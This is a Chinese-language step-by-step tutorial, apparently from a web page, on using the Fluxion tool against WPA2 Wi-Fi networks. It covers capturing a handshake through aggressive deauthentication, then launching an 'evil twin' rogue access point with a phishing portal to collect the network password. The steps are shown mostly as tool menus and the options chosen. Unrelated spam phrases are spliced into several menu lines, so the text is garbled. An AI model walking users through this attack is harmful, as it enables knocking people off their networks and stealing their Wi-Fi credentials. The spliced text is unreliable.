Fluxion教程WiFi钓鱼
2.执⾏完成后,会⽣成⼀个⽂件夹,这个⽂件夹⽣成的位置,就在你的主⽂件夹⾥(因为你终端执⾏命令时就在主⽂件⽬录⾥,想⾃⼰换⽂件夹安装,就⾃⼰建⽂件夹,在⽂件夹⾥打开终端,然后执⾏命令),点击桌⾯的主⽂件夹,就可以看到你克隆过来的fluxion⽂件夹。
3.打开⽂件夹,在⽂件夹的空⽩处点击右键,选择在这⾥打开终端,重新输⼊sudo su 获取权限,(如果你了解linux操作命令的话,直接加路径执⾏命令也可以)
在⽂件⾥执⾏的原因是因为可执⾏⽂件在⽂件夹⾥,知道路径的话直接路径执⾏也可以。
4.直接执⾏:./fluxion.sh -i
·这⾥⽹上都让你先执⾏./fluxion.sh,完全没有意义的⼀步操作,没安装依赖⽂件,不可能执⾏成功的,这个⽂件是你安装依赖后去执⾏的⽂件,相当于开启⼀个应⽤软件,还没安装完,开启肯定失败。安装后执⾏就能进⼊了。
./fluxion.sh -i
5.执⾏完成后你就安装完成了,进⼊了选择界⾯,选择17中⽂。
下次使⽤的的话执⾏./fluxion.sh这个就可以了,不需要再去安装依赖⽂件。
[*] Select your language
[1] ar / Arabic
土地证过户[2] cs / čeština
打游戏卡[3] de / Deutsc
[4] el / Ελληνικά
[5] en / English
[6] es / Español
[7] fr / français
[8] it / italiano
[9] nl / Nederlands
[10] pl / Polski
[11] pt-br / Português-BR
[12] ro / Română
[13] ru / Русский
[14] sk / slovenčina
[15] sl / Slovenščina
[16] tur / Türkçe
[17] zh / 中⽂
[fluxion@test]-[~]17
接下来就到了使⽤环节了
1.使⽤时要到⽂件夹⾥打开终端模拟器获取su权限然后执⾏。否则执⾏不了。
2.接下来开始正式使⽤。第⼀坑开始。。。
(假设你的⽹卡可以⽤,下⼀篇介绍这些问题)
相信很多⼈在⽹上看到过教程,直接就执⾏1,然后选择到最后,发现需要⼀个路径,这个路径怎么也添加不上,即使你建⽂件夹了,建⽂件了也没⽤,就是添加失败。这是因为他需要的⽂件不是直接建⽴的⽂件,⽽是⼀个抓包后⽣成的⽂件,需要抓包,我们这⾥先执⾏2.抓到包以后,它会⾃动⽣成抓包后的⽂件,路径也不需要你去配置了,如果想⾃⼰配置,提供⼀种思路,把⼆抓包⽣成的⽂件⾃⼰改名保存好,再去配置路径。再去执⾏1.
3.我们先插上可以⽤的⽹卡
⽹卡识别问题:
a.虚拟机软件不识别⽹卡——插拔接⼝
b.kali linux 系统不识别⽹卡——没驱动
4.虚拟机的状态栏⾥点击查看旁边的虚拟机,选择可移动设备,到你的⽹卡,⼀般都是带wlan 802 ralink 关键字的设备,选择与主机连接。
5.连接成功就是这样,⿏标放上,会出提⽰。
6.这⾥证明我们的⽹卡可以被软件识别,当然前提是你的电脑可以识别使⽤这张⽹卡,电脑都识别不了的⽹卡,虚拟机⼤概率也识别不了。我的⽹卡是免驱的,这⾥⽹卡就说这么多。后⾯会详细介绍⽹卡问题,⽹卡问题,移步第五篇。
7.⽹卡连接成功后,我们选择第⼆个选项。
[*] 请选择⼀个攻击⽅式
ESSID: "[N/A]" / [N/A]
Channel: [N/A]
BSSID: [N/A]([N/A])
[1] 专属门户创建⼀个“邪恶的双胞胎”接⼊点。
[2] Handshake Snooper 检索WPA/WPA2加密散列。
[3] 返回
[fluxion@test]-[~] 2
8.然后选择扫描的信道。看你的⽹卡⽀持什么信道,⾃⼰选择。我的都⽀持,我选择3.
[*] 选择要扫描的信道
[1] 扫描所有信道 (2.4GHz)
[2] 扫描所有信道 (5GHz)
[3] 扫描所有信道 (2.4GHz & 5Ghz)
[4] 扫描指定信道
[5] 返回
[fluxion@test]-[~] 3
9.会出现⼀个弹窗,扫描出你附近的wifi,扫描到你想要测试的wifi后按ctrl +c,就保存了你扫描到的WiFi了,这⼀步容易扫描不到WiFi,多插拔⼏次⽹卡试试,或者关闭fluxion重启,或者重启虚拟机,我是插拔了⽹卡就好使了。
[040] PHICOMM_BC4B74-Plus 100% -32 0 11 WPA2 C8:5B:A0:07:3D:E0
[041] ??% -1 0 12 C8:3A:35:25:2F:18
[042] ??% -1 0 13 BC:5F:F6:A8:FA:CF
[fluxion@test]-[] 40
][fluxion@test]-[
我⾃⼰的wifi是040,所以我选择40,不要输⼊040,不识别的,⾃⼰选择你的wifi。
10.⼜来坑了,接下来,⽹上很多说选择你的⽹卡的,这⾥不要选择你的⽹卡,选择后你最后建⽴热点的时候会卡住。。。我们选择2. [] 为⽬标跟踪选择⽆线接⼝.
[] 可能需要选择专⽤接⼝.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0 [*] Ralink Technology, Corp. RT5370
[2] 跳过
[3] 重试
[4] 返回
11.接下来选择攻击⽅式。2和3都可以,我选择3.
[*] 选择⼀种⽅式来检查握⼿包获取状态
[1] 监听模式 (被动)
[2] aireplay-ng 解除认证⽅式 (侵略性)
[3] mdk4 解除认证⽅式 (侵略性)
[4] 返回
[fluxion@test]-[~] 3
12.选择 2 .
[*] 选择Hash的验证⽅法
[1] aircrack-ng 验证 (不推荐)
[2] cowpatty 验证 (推荐⽤这个)
[3] 返回
[fluxion@test]-[~] 2
13.选择 1
1
ESSID: “PHICOMM_BC4B74-Plus” / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[*] 每隔多久检查⼀次握⼿包
[1] 每30秒钟 (推荐).
[2] 每60秒钟
英国女王是世袭制吗[3] 每90秒钟
[4] 返回
[fluxion@test]-[~] 1
14.选择 2
[*] 如何进⾏验证?
[1] Asynchronously (fast systems only).
[2] Synchronously (推荐).
[3] 返回
[fluxion@test]-[~] 2
15.开始抓包了。
16.抓包成功了。
17.解释⼀下我的理解,我们在⼲什么,我们现在抓取到了第⼀步执⾏时提⽰缺少路径有问题的哪个⽂件,执⾏完这个后,我们再去执⾏1,就不会有那个路径问题了,你⾃⼰有抓包插件,直接抓包保存,然后配置路径也可以,我们这⾥⽤fluxion⾃⼰带的⼯具。
这个包是⼲什么的?这个包我看⽹上介绍,我理解为这个包是⼀个校验密码的包,有了它,我们在⽤户输⼊密码的时候,就可以检测出密码是否正确了。应该也有⼈⽤字典去跑这个包,把密码跑出来,暴⼒破解不知道有没有,我们是⽤来检测密码的。
提供⼀下路径:/home/usertest/fluxion/attacks/Handshake Snooper/handshakes/
包在这⾥,想搞什么⾃⼰研究。
18.⾔归正传,抓完包后,我们选择1
*] Handshake Snooper 正在进⾏攻击…
[1] 选择启动攻击⽅式
[2] 退出
[fluxion@test]-[~] 1
19.这回可以开始搞密码了,选择1
[*] 请选择⼀个攻击⽅式
ESSID: "PHICOMM_BC4B74-Plus" / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[1] 专属门户创建⼀个“邪恶的双胞胎”接⼊点。
[2] Handshake Snooper 检索WPA/WPA2加密散列。
[3] 返回
[fluxion@test]-[~] 1
20.选择y(这⾥不继续也可以,但是还要重新扫描,建议直接y)
重新扫描也不影响,
注意:
你下次进⼊fluxion时,如果还是选择上次那个wifi进⾏测试,就不需要在刚开始那⾥选择2了,因为包已经抓过了,默认路径也是你抓包的路径,如果你重新选择其他WiFi,就需要重新执⾏最开始的2抓包了。
抓过包的WiFi,包都在上⾯提到路径下,想⾃⼰配置路径就⾃⼰配置吧,新⼿不建议。
每次选择不同的WiFi,都要重新执⾏2,会配置路径的配置路径,新⼿还是重新执⾏⼀次2吧,否则最后钓鱼热点建⽴成功了,但是你的校验包不正确,就得不到正确密码。(错误密码也有记录,后⾯统⼀写正确密码和错误密码的路径)
ESSID: “PHICOMM_BC4B74-Plus” / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[] Fluxion正在瞄准上⾯的接⼊点.
[] 继续这个⽬标? [Y/n]
21.⼜到了这⾥,选择2,选择1,后⾯的钓鱼热点就开不开了。
[] 为⽬标跟踪选择⽆线接⼝.
[] 可能需要选择专⽤接⼝.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0 [*] Ralink Technology, Corp. RT5370
[2] 跳过
[3] 重试
[4] 返回
[fluxion@test]-[~] 2
22.选择2
[*] 为接⼊点选择⼀个接⼝
[1] eth0 [-] Intel Corporation 82545EM Gigabit Ethernet Controller (Co
[2] wlan0 [*] Ralink Technology, Corp. RT5370
[3] 重试怎样做疙瘩汤
[4] 返回
[fluxion@test]-[~] 2
23.这⾥需要⾃⼰尝试啦,我选择的是3,我的电脑选择⽅式1进⾏攻击的话,钓鱼热点建⽴成功后,所有⼈都连接不上这个热点,如果你的热点也⽆法连接,可以尝试修改这个。
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
[fluxion@test]-[~] 3
24.选择1
[*] 选择⼀个接⼊点
ESSID: "PHICOMM_BC4B74-Plus" / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[1] 流氓 AP - hostapd (推荐)
谢文东经典语录[2] 流氓 AP - airbase-ng (缓慢)
[3] 返回
[fluxion@test]-[~] 1
25.选择1
[*] 请选择验证密码⽅式
ESSID: "PHICOMM_BC4B74-Plus" / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[1]hash - cowpatty
[2]hash - aircrack-ng (default, unreliable)
[3] 返回
[fluxion@test]-[~] 1
26.这⾥选择 1,这就是我为什么让你最开始先执⾏2的原因,好多教程都不说原因,导致⼀些不会抓包的⼈卡在了路径错误上,这⾥不是路径的问题,是你缺少抓包后⽣成的⽂件。我们先执⾏了2.所以路径配置好了这⾥直接执⾏1就可以了。
8月份去张家界好吗⾃⼰配置也可以,因为抓包路径在上⽂我已经给出。去路径⾥到⽂件名⾃⼰改吧。新⼿直接1.
[] 发现⽬标热点的Hash⽂件.
[] 你想要使⽤这个⽂件吗?
[1] 使⽤抓取到的hash⽂件
[2] 指定hash路径
[3] 握⼿包⽬录(重新扫描)
[4] 返回
[fluxion@test]-[~] 1
26.选择2,提⽰校验成功。
[*] 选择Hash的验证⽅法
ESSID: "PHICOMM_BC4B74-Plus" / WPA2
Channel: 11
BSSID: C8:5B:A0:07:3D:E0 ([N/A])
[1] aircrack-ng 验证 (不推荐)
[2] cowpatty 验证 (推荐⽤这个)
[fluxion@test]-[~] 2
27.选择1
[*] 选择钓鱼认证门户的SSL证书来源
[1] 创建SSL证书
[2] 检测SSL证书 (再次搜索)
[3] 没有证书 (disable SSL)
[4] 返回
[fluxion@test]-[~] 1
28.选择1
[*] 为流氓⽹络选择Internet连接类型
[1] 断开原⽹络 (推荐)
[2] 仿真
[3] 返回
[fluxion@test]-[~] 1
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论